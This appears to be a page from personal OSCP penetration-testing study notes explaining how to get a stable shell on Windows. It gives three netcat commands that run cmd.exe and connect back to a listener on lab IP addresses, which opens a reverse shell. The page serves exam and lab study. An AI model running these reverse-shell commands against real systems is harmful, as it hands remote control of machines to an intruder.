O
O
OSCP Notes
Search…
⌃K
Introduction
Port scanning
Passive Information Gathering
Ports enum:
Recon Tools
Tech Skills Needed
msfvenom
meterpreter commands
Web Apps
python scripts
Windows hacks
Transferring files through RDP share
ASP
Port 161:SNMP - SNMPwalk to discover VPN key(PSK)
Directory Traversal Cheatsheet
uploading a file to IIS
How to get a stable shell on windows
Electron App (decompile and find secrets!)
RDP Brute forcing
evilwinrm
print nightmare
Word Object linking (client-side)
Have access to backup SAM & SYSTEM files?
Port Forwarding
Reverse shells
Binary exploitation
Transfering Modules
Buffer Overflow
Cracking!
shellshock
Active Directory
Antivirus Evasion
Windows Priv Esc
Linux Priv Esc
Active Directory Case Studies
Pivoting
C program analysis
Misc
Hack the box Write-ups
THM Offensive Security Path
Proving Ground
Cyber Sec Labs
Powered By GitBook

How to get a stable shell on windows

Transfer nc.file and execute the following & have the nc listening on kali.
PS C:\Windows\Temp> C:\Windows\Temp\nc.exe 192.168.119.153 9002 -e cmd.exe
​
C:\Windows\Temp\nc.exe 192.168.119.212 443 -e cmd.exe
​
C:\Inetpub\Scripts\nc.exe 192.168.119.181 443 -e cmd.exe
Previous
uploading a file to IIS
Next
Electron App (decompile and find secrets!)
Last modified 8mo ago
Copy link